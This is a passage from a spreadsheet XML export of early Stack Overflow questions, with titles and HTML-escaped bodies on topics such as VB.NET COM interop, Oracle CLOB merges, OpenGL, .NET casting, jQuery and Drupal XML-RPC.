&lt;p&gt;&lt;em&gt;Related Sidenote:&lt;/em&gt;  It sure would be nice if there were a "Cartoon Guide to Algorithm Analysis", taught by Dilbert.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt;  A very similar question can be found at: &lt;a href="http://stackoverflow.com/questions/366418/how-to-get-started-on-algorithms"&gt;How to get started on ALGORITHMS?&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Exposing inherited members of a COM vb.net class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two vb.net class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Public MustInherit Class Class1
    Private m_sProperty1 As String = ""
    Public Property sProperty1() As String
        Get
            Return m_sProperty1
        End Get
        Set(ByVal value As String)
            m_sProperty1 = value
        End Set
    End Property
End Class
&amp;lt;ComClass("classid","interfaceid","eventid")&amp;gt; _
Public Class Class2
    Inherits Class1
    Private m_sProperty2 As String = ""
    Public Property sProperty2() As String
        Get
            Return m_sProperty2
        End Get
        Set(ByVal value As String)
            m_sProperty2 = value
        End Set
    End Property
End Class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I reference the compiled DLL through VB6, Class2 only exposes sProperty2.  How can I access the inherited property of the base class (sProperty1) through COM?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a built in .NET exception that indicates an illegal object state?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What exception should I throw if I encounter an illegal state - for instance, an initialization method that should only be called once being called a second time?  I don't really see any built-in exception that makes sense.  This seems like something that should be in the framework - am I not poking in the right spot?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript - multiple client-side validations on same event</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am performing two validations on the client side on the samve event.
I have defined my validations as shown below&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;btnSearch.Attributes["OnClick"] = "javascript:return prepareSave(); return prepareSearch();"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Pseudo code for &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;prepareSave():
{
  if (bPendingchanges)
    {
     return confirm('Need to save pending changes first, click OK and loose changes or cancel to save them first')
    }
  else
   {return true}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Pseudo code for &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;prepareSearch():
{
  if (bNoSearchText)
    {
      alert('Please specify search criteria before proceeding')
      return false;
   }
  else
   {return true;}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When &lt;code&gt;bPendingchanges=false&lt;/code&gt;, I never get the second validation running.
Anyone who can quickly spot what I have overlooked here? Please?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Oracle single-table constant merge with CLOB using JDBC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a follow-up to &lt;a href="http://stackoverflow.com/questions/167471/"&gt;this question&lt;/a&gt;, I need help with the following scenario:&lt;/p&gt;
&lt;p&gt;In Oracle, given a simple data table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;create table data (
    id       VARCHAR2(255),
    key      VARCHAR2(255),
    value    CLOB);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am using the following merge command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;merge into data
using (
    select
        ? id,
        ? key,
        ? value
    from
        dual
) val on (
    data.id=val.id
    and data.key=val.key
)
when matched then 
    update set data.value = val.value 
when not matched then 
    insert (id, key, value) values (val.id, val.key, val.value);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am invoking the query via JDBC from a Java application.&lt;/p&gt;
&lt;p&gt;When the "value" string is large, the above query results in the following Oracle error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ORA-01461: cannot bind a LONG value for insert into a long column
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I even set the "SetBigStringTryClob" property as documented &lt;a href="http://www.oracle.com/technology/sample_code/tech/java/codesnippet/jdbc/clob10g/handlingclobsinoraclejdbc10g.html" rel="nofollow"&gt;here&lt;/a&gt; with the same result.&lt;/p&gt;
&lt;p&gt;Is it possible to achieve the behavior I want given that "value" is a CLOB?&lt;/p&gt;
&lt;p&gt;EDIT: Client environment is Java&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OpenGL glDrawPixels on dynamic 3D arrays</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you draw the following dynamic &lt;strong&gt;3D&lt;/strong&gt; array with OpenGL &lt;strong&gt;glDrawPixels()&lt;/strong&gt;?
You can find the documentation here: &lt;a href="http://opengl.org/documentation/specs/man_pages/hardcopy/GL/html/gl/drawpixels.html" rel="nofollow"&gt;http://opengl.org/documentation/specs/man_pages/hardcopy/GL/html/gl/drawpixels.html&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;float ***array3d;
void InitScreenArray()
{
    int i, j;
    int screenX = scene.camera.vres;
    int screenY = scene.camera.hres;
    array3d = (float ***)malloc(sizeof(float **) * screenX);
    for (i = 0 ;  i &amp;lt; screenX; i++) {
    	array3d[i] = (float **)malloc(sizeof(float *) * screenY);
    	for (j = 0; j &amp;lt; screenY; j++)
    	  array3d[i][j] = (float *)malloc(sizeof(float) * /*Z_SIZE*/ 3);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can use only the following header files:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;math.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;windows.h&amp;gt;     
#include &amp;lt;GL/gl.h&amp;gt;
#include &amp;lt;GL/glu.h&amp;gt;
#include &amp;lt;GL/glut.h&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>.NET bug when converting float to integer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Check it out: this little .NET Console Program yields interesting results...notice how I'm converting a float to an integer in two different ways:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace CastVsConvert
{
    class Program
    {
        static void Main(string[] args)
        {
            int newWidth = 0;
            CalculateResizeSizes(600, 500, out newWidth);
        }
        static void CalculateResizeSizes(int originalWidth, int maxWidth, out int newWidth)
        {
            float percentage = 1.0F;
            percentage = maxWidth / (float)originalWidth;
            newWidth = (int)((float)originalWidth * percentage);
            int newWidthConvert = Convert.ToInt32((float)originalWidth * percentage);
            Console.Write("Percentage: {0}\n", percentage.ToString());
            Console.Write("Cast: {0}\n", newWidth.ToString());
            Console.Write("Convert: {0}\n", newWidthConvert.ToString());
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would expect the output for "Cast" and "Convert" to be the same, but they're not...here's the output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;C:\Documents and Settings\Scott\My Documents\Visual Studio 2008\Projects\CastVsC
onvert\CastVsConvert\bin\Debug&amp;gt;CastVsConvert.exe
Percentage: 0.8333333
Cast: 499
Convert: 500
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anybody know why .NET is returning different values here?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>HttpWebRequest, known problems with canceling requests?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any known issues with canceling HttpWebRequest HTTP requests? We find that when we cancel 4-5 requests, the next request hangs indefinitely.&lt;/p&gt;
&lt;p&gt;If there are no known problems with this, then I'm probably doing something wrong... where is a good resource example that shows how this works (a complete solution, not a couple of code snippets)?&lt;/p&gt;
&lt;p&gt;If there are known problems, what can I do to work around them, in order to effectively cancel as many requests as I need to?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Updating a Database from DataBound Controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently creating a WinForm in VB.NET bound to an access database.&lt;/p&gt;
&lt;p&gt;Basically what i have are two forms: one is a search form used to search the database, and the other is a details form. You run a search on the searchForm and it returns a list of Primary Keys and a few other identifying values. You then double click on the entry you want to view, and it loads the details form.&lt;/p&gt;
&lt;p&gt;The Details form has a collection of databound controls to display the data: mostly text boxes and checkboxs. The way i've set it up is i used the UI to build the form and then set the DataBindings Property of each control to "TblPropertiesBindingSource - " where value name is one of the values in the table (such as PropertyID or HasWoodFloor).&lt;/p&gt;
&lt;p&gt;Then, when you double click an entry in the searchform, I handle the event by parsing the Primary Key (PropertyID) out of the selected row and then storing this to the details form:&lt;/p&gt;
&lt;p&gt;Note: Detail is the details form that is opened to display the info&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private Sub propView_CellDoubleClick(ByVal sender As Object, ByVal e As System.Windows.Forms.DataGridViewCellEventArgs) Handles propView.CellDoubleClick
        Dim detail As frmPropertiesDetail = New frmPropertiesDetail
        detail.id = propView.Rows(e.RowIndex).Cells(0).Value
        detail.Show()
    End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then, upon loading the details form, it set's the filter on the BindSource as such:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TblPropertiesBindingSource.Filter() = "PropertyID=" &amp;amp; id
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works great so far. All the controls on the details form will display the correct info. The problem is updating changes. &lt;/p&gt;
&lt;p&gt;Scenario:
If i have the user load the details for say, property 10001, it will show a description in a textBox named descriptionBox which is identical to the value of the description value of for that entry in the database. I want the user to then be able to change the text of the text box (which they can currently do) and click the save button (saveBut) and have the form update all the values in the controls to the database.&lt;/p&gt;
&lt;p&gt;Theorectically, it should do this as the controls are DataBound, thus i can avoid writing code that tells each entry in the database row to take the value of the aligned control.&lt;/p&gt;
&lt;p&gt;I've tried calleding PropertiesTableAdapter.Update(PropertiesBindingSource.DataSource), but that doesnt seem to do it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to get the matching string from an SQL query?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have a query to return all matching entries in a DB that have "news" in the searchable column (i.e. &lt;code&gt;SELECT * FROM table WHERE column LIKE %news%&lt;/code&gt;), and one particular row has an entry starting with "In recent World news, Somalia was invaded by ...", can I return a specific "chunk" of an SQL entry? Kind of like a teaser, if you will.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make the group-box text background transparent</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to make a transparent dialog. I capture the OnCtlColor message in a CDialog derived class...this is the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HBRUSH CMyDialog::OnCtlColor(CDC* pDC, CWnd* pWnd, UINT nCtlColor) 
{
   HBRUSH hbr = CDialog::OnCtlColor(pDC, pWnd, nCtlColor);
   if(bSetBkTransparent_)
   {
      pDC-&amp;gt;SetBkMode(TRANSPARENT);
      hbr = (HBRUSH)GetStockObject(NULL_BRUSH);        
   }
   return hbr;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It works fine for all the controls but the group-box (CStatic). All the labels (CStatic) are been painted with a transparent text background but the text of the group box it is not transparent.&lt;/p&gt;
&lt;p&gt;I already googled for this but I didn't find a solutions. Does anybody know how to make a real transparent group-box?&lt;/p&gt;
&lt;p&gt;By the way, I am working in Windows XP. And I don't want to fully draw the control to avoid having to change the code if the application is migrated to another OS.&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Javier&lt;/p&gt;
&lt;p&gt;Note: I finally changed the dialog so that I don't need to make it transparent. Anyway, I add this information because maybe someone is still trying to do it. The groupbox isn't a CStatic but a CButton (I know this is not new). I changed the Windows XP theme to Windows classic and then the groupbox backgraund was transparent. The bad new is that in this case the frame line gets visible beneath the text...so if someone is following this approach I think maybe he/she would better follow the Adzm's advice.   &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Download file with Resume capability for windows servers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building an Auto Updater for a winforms desktop application.&lt;/p&gt;
&lt;p&gt;When the update is downloading, how can I provide a &lt;b&gt;Resume download&lt;/b&gt; capability in case the customers internet connection breaks?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should I treat strings of digits in XML::RPC and Drupal?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use an XML-RPC server on my Drupal (PHP) backend to make it easier for my Perl backend to talk to it.  However, I've run into an issue and I'm not sure which parts, if any, are bugs.  Essentially, some of the variables I need to pass to Drupal are strings that sometimes are strings full of numbers and the Drupal XML-RPC server is returning an error that when a string is full of numbers it is not properly formed.&lt;/p&gt;
&lt;p&gt;My Perl code looks something like this at the moment.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;use strict;
use warnings;
use XML::RPC;
use Data::Dumper;
my $xmlrpc = XML::RPC-&amp;gt;new(URL);
my $result = $xmlrpc-&amp;gt;call( FUNCTION, 'hello world', '9876352345');
print Dumper $result;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The output is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$VAR1 = {
      'faultString' =&amp;gt; 'Server error. Invalid method parameters.',
      'faultCode' =&amp;gt; '-32602'
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I have the Drupal XML-RPC server print out the data it receives, I notice that the second argument is typed as i4:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;param&amp;gt;
&amp;lt;value&amp;gt;
&amp;lt;i4&amp;gt;9876352345&amp;lt;/i4&amp;gt;
&amp;lt;/value&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I think when Drupal then finishes processing the item, it is typing that variable as an int instead of a string.  This means when Drupal later tries to check that the variable value is properly formed for a string, the is_string PHP function returns false.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foreach ($signature as $key =&amp;gt; $type) {
  $arg = $args[$key];
  switch ($type) {
    case 'int':
    case 'i4':
      if (is_array($arg) || !is_int($arg)) {
        $ok = FALSE;
      }
      break;
    case 'base64':
    case 'string':
      if (!is_string($arg)) {
        $ok = FALSE;
      }
      break;
    case 'boolean':
      if ($arg !== FALSE &amp;amp;&amp;amp; $arg !== TRUE) {
        $ok = FALSE;
      }
      break;
    case 'float':
    case 'double':
      if (!is_float($arg)) {
        $ok = FALSE;
      }
      break;
    case 'date':
    case 'dateTime.iso8601':
      if (!$arg-&amp;gt;is_date) {
        $ok = FALSE;
      }
      break;
  }
  if (!$ok) {
    return xmlrpc_error(-32602, t('Server error. Invalid method parameters.'));
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I'm not sure about is on which side of the divide the issue lies or if there is something else I should be using.  Should the request from the Perl side be typing the content as a string instead of i4 or is the Drupal side of the request too stringent for the string type?  My guess is that the issue is the latter, but I don't know enough about how an XML-RPC server is supposed to work to know for sure.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to justify more ram for SQL Server 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have SQL Server 2005 running on Win2003/64, and we push it hard.  We generate real time reports on several tables with a couple million records using asp.net 3.5, and they will periodically time out.&lt;/p&gt;
&lt;p&gt;I'd like to increase our memory from 8GB to 16GB or even 32GB to see how that helps, but I need to justify this to the pencil pushers before they will spend the money.  Can someone point me to some resources that will help me make my case and will get me some hard numbers to use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is anybody using OBIEE (formerly Siebel Analytics) ? What is your experience</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are in the process of selecting BI stack for our data warehouse. The top contenders are OBIEE = Oracle BI Enterprise Edition (formerly Siebel Analytics) and Microstrategy.&lt;/p&gt;
&lt;p&gt;Has anyone worked with OBIEE? Lessons learned? General impressions? Flaws, strengths?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>After clicking the nth item, how do I manipulate another nth element?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using jQuery and wanting to target the nth &amp;lt;li&amp;gt; in a list after clicking the nth link.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul id="targetedArea"&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;div id="clickedItems"&amp;gt;
  &amp;lt;a&amp;gt;&amp;lt;/a&amp;gt;
  &amp;lt;a&amp;gt;&amp;lt;/a&amp;gt;
  &amp;lt;a&amp;gt;&amp;lt;/a&amp;gt;
  &amp;lt;a&amp;gt;&amp;lt;/a&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can target them individually, but I know there must be a faster way by passing which &amp;lt;a&amp;gt; element I clicked on.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("#clickedItem a:eq(2)").click(function() {
  $("#targetedArea:eq(2)").addClass('active');
  return false;
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Cheers,&lt;br /&gt;
Steve &lt;/p&gt;
</t>
  </si>
  <si>
    <t>import data from a webpage to excel</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm in need of a macro that will enter data into a webpage search field and than copy the results to excel.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Display HTML in an Actionscript 3 project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Folks,&lt;/p&gt;
&lt;p&gt;I am pulling all my Flash (pure AS3 project, not Flash CS3) content from a Drupal back-end for SEO purposes.  This works great, except the HTML rendering built into the TextField object leaves a lot to be desired.  Could anyone recommend any libraries that would allow me to display HTML elements?  At this stage, commercial or open-source libraries are welcome.&lt;/p&gt;
&lt;p&gt;Thanks,
Marcus&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get partition ranges in SQL 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a partitioned table in SQL Enterprise 2005. I need to query the PARTITION FUNCTION to find it's partition ranges. What SQL query will give me those values?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are non-pure virtual functions with parameters bad practice?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a base class with an optional virtual function&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Base {
    virtual void OnlyImplementThisSometimes(int x) {}
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I compile this I get a warning about the unused param x.  Is there some other way I should have implemented the virtual function?  I have re-written it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Base {
    virtual void OnlyImplementThisSometimes(int x) 
    {
        x = 0;
    }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I also have the problem that if I'm not careful, the subclass I make can implement the wrong function and then I don't notice because of overloading: e.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Derived : public Base {
    void OnlyImplementThisSometimes(int x, int y) { // some code }
};
Derived d;
Base *b = dynamic_cast&amp;lt;Base *&amp;gt;(&amp;amp;d);
b-&amp;gt;OnlyImplementThisSometimes(x); // calls the method in the base class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The base class method was called because I implemented the derived function with an "int y" param but there is no warning about this.  Are these just common pitfalls in C++ or have I misunderstood virtual functions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you scrape AJAX pages?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The title says it all. Please advise how to scrape AJAX pages.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Required Field Validator Not Firing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having an issue with a standard ASP.NET page that has a TextBox and a RequiredFieldValidator.  The steps to reproduce are quite simple:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Place a TextBox on a page&lt;/li&gt;
&lt;li&gt;Place a RequiredFieldValidator on the page&lt;/li&gt;
&lt;li&gt;Point the RequiredFieldValidator at the TextBox&lt;/li&gt;
&lt;li&gt;Run the app&lt;/li&gt;
&lt;li&gt;Tab away from the TextBox the RequiredFieldValidator does not show&lt;/li&gt;
&lt;li&gt;Enter text, then delete the text and THEN tab away, the RequiredFieldValidator does show&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The RequiredFieldValidator works fine in both cases after a postback, however it seems the client-side code isn't firing until something is entered into the textbox (and then deleted).&lt;/p&gt;
&lt;p&gt;Does anyone have a solution to this without hacking away at JavaScript myself?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Resizable Java component</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to have a Java component which has a resize icon on the bottom right of the component so that when I drag that icon, the component will automatically resize with it.&lt;/p&gt;
&lt;p&gt;By resize icon, I mean the following:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://lh5.ggpht.com/%5F7dfPdX2BP6o/SQ%5FsPvvHpTI/AAAAAAAAAKU/vRWKb%5FpLVvc/s144/resize%20icon.jpg" alt="resize icon in Google Talk" /&gt;&lt;/p&gt;
&lt;p&gt;The above image contains the resize icon in the Google Talk messenger's main window. Is there any Java component which provides this facility?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>conditional formating in rails partials</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am rendering a rails partial and I want to alternate the background color when it renders the partial.  I know that is not super clear so here is an example of what I want to do:&lt;/p&gt;
Row One grey Background
Row Two yellow background
Row Three grey Background
Row Four yellow background
&lt;ul&gt;
&lt;li&gt;sorry stackoverflow seams to prevent the background colors from being shown but I think this makes my idea clear&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is the view code that I am using  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;table&amp;gt;
  &amp;lt;%= render :partial =&amp;gt; 'row' :collection =&amp;gt; @rows %&amp;gt;
&amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the _row.html.erb partial looks like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;tr bgcolor="#AAAAAA"&amp;gt;
  &amp;lt;td&amp;gt;&amp;lt;%= row.name %&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;/tr&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is I do not know how to change the background color for every other row.  Is there away to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Userland autoboxing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to implement autoboxing for your own classes?&lt;/p&gt;
&lt;p&gt;To illustrate my example, this is what I might want to write:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Foo foo = "lolcat";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And this is what Java would do (as per my own definitions, somewhere, somehow), under the hood:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Foo foo = new Foo();
foo.setLolcat("lolcat");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, is this possible somehow, or is it a JVM-feature only?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I use MSTest without Visual Studio?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does MSTest have standalone GUI similar to nUnit that lets me use it and run test without visual studio? What is the official site for MSTest where I can learn more about how to use it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MDI Parent Menu and Child Menu</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using VB.Net on Winforms Development developing an MDI application.&lt;/p&gt;
&lt;p&gt;In my Parent form, I have a menu strip.  In my child forms, I also have a menu strip attached to each form, which invokes a different set of command when accessed.  Is it possible then that in an MDI form, the child form which is currently active be the menu that would display in the parent form?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>start specific iis 6.0 website via script</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've googled around and can't find a clear answer.&lt;/p&gt;
&lt;p&gt;I simply want to start some of my iis 6.0 websites via a script that will be run on start up.&lt;/p&gt;
&lt;p&gt;anyone got any tips for that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detect whether adobe reader is installed using VB code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to detect whether adobe reader is installed using VB6. Also if detected that it's not installed, what would be the best solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to perform system tasks from Ruby on Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a small system administration web application (think Web-Min, but in RoR) and I need to be able to access system parameters from my Ruby code.  For instance, I want to allow the user to change the hostname, time zone, or network config of the server.  &lt;/p&gt;
&lt;p&gt;My current thoughts are to have a separate setuid script (Perl, Ruby, ??) so that I can call it from my RoR code and it will perform the actions.  That is quite cumbersome and not very elegant.  I'm a Ruby newbie and would like to know if there is a better way to accomplish this type of thing.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to build Python C extension modules with autotools</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Most of the documentation available for building Python extension modules
uses distutils, but I would like to achieve this by using the appropriate
python autoconf &amp;amp; automake macros instead.&lt;/p&gt;
&lt;p&gt;I'd like to know if there is an open source project out there that does
exactly this. Most of the ones I've found end up relying on a setup.py file.
Using that approach works, but unfortunately ends up rebuilding the entire
source tree any time I make a modification to the module source files.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IPC with Message Passing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for suggestions on possible IPC mechanisms that I can implement in my self-made OS for an AVR32 board. &lt;/p&gt;
&lt;p&gt;My current choice is implementing the massage passing mechanism described in the books written by Tanenbaum. &lt;/p&gt;
&lt;p&gt;Is this a good choice? Are there easier way to implement IPC?&lt;/p&gt;
&lt;p&gt;Thanks &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Overflow when calculating a const in VBA</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This declaration causes an overflow in VBA:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Const OVERFLOWS As Long = 10 * 60 * 60
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;whereas setting the value directly is fine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Const COMPILES_OK As Long = 36000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do you persuade VBA to treat literal integers as longs?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I set an image for some but not all nodes in a TreeView?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;TreeView&lt;/code&gt; windows forms control with an &lt;code&gt;ImageList&lt;/code&gt;, and I want some of the nodes to display images, but the others to not have images.&lt;/p&gt;
&lt;p&gt;I &lt;em&gt;don't&lt;/em&gt; want a blank space where the image should be.  I &lt;em&gt;don't&lt;/em&gt; want an image that looks like the lines that the TreeView would draw if it didn't have an ImageList.  How do I get it to draw images for some items and not others, without resorting to clumsy hacks like that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NSDateFormatter won't parse dates using locale settings?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to parse dates using the user's date preferences&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[NSDateFormatter setDefaultFormatterBehavior:NSDateFormatterBehavior10_4];
NSDateFormatter *dateFormatter = [[[NSDateFormatter alloc] init] autorelease];
[dateFormatter setDateStyle:NSDateFormatterShortStyle];
NSDate *date = [ dateFormatter dateFromString:@"7/4/2008" ];
NSLog(@"string from date %@: %@ for locale %@", date, [dateFormatter stringFromDate:date], [[dateFormatter locale] localeIdentifier]);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I set my region (in the International system preferences) to be United States, it prints:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;2008-08-14 20:20:31.117 Date Difference17226:10b string from date 2008-07-04 00:00:00 -0400: 7/4/08 for locale en_US
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And when my region is United Kingdom, it prints:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;2008-08-14 20:19:23.441 Date Difference17199:10b string from date 2008-04-07 00:00:00 -0400: 07/04/2008 for locale en_GB
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It looks like the NSDateFormatter is insensitive to the change of regions. Notice that the raw printing of the date is properly switching with the region, though.&lt;/p&gt;
&lt;p&gt;What do I have to do to get the NSDateFormatter to respect the region setting? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>rollover effect using Jquery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Would you please help me in making a rollover effect using jquery, what i want to do is when someone hover over any of the menu items the text slide down and disappear and a picture slides from the top down to the center (e.g. you could see this effect here &lt;a href="http://www.iviewcom.com/panda" rel="nofollow"&gt;panda&lt;/a&gt; as you can see the picture slide down from the top but the text does not slide down which is not what want).&lt;/p&gt;
&lt;p&gt;I know it can be easily done using flash but i don't want my menu in flash as that would be a bad practice. &lt;/p&gt;
&lt;p&gt;can you tell me what do i need to change in my menu HTML and what jquery functions should i use.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Thanks So much for your help&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;P.S. this my menu HTML and you can see my menu here &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ul class="nav"&amp;gt;
